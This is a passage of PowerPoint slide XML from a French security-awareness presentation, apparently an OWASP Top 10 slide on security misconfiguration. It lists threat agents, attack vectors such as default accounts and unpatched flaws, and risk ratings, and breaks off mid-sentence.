                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>      Vulnérabilités</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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fr-FR"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fr-FR"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fr-FR"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fr-FR"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fr-FR"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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’attaque</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>techniques</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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208622" y="1280701"/>
                <a:ext cx="708848" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>de menace</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>métier</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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fr-FR"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ustDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171511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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3605585082"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948521"/>
          <a:ext cx="6858000" cy="2663359"/>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51679">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r>
              <a:tr h="382446">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Application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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Mise</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>en oeuvre</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SIMPLE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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMUNE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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Détectabilité</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILE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MODERE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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>   Application/Métier</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51035">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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>attaquants</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>externes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>anonymes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>utilisateurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>légitimes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peuvent tenter de compromettre le système.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>aussi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des internes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>voulant dissimuler leurs actes.</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dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attaquant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>accédant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>comptes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> par </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>défaut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, pages non </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>utilisées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vulnérabilités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> non </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>corrigées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fichiers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>répertoires</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> non protégés, etc. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Afin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’obtenir</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>accès</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> non </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>autorisés</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>informations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>système</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</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just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>mauvaise</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> configuration de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sécurité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>survenir</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’ensemble</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des couches, la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>plateforme</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>serveur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> web, le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>serveur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, le Framework et le code </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Développeurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>administrateurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> system </a:t>
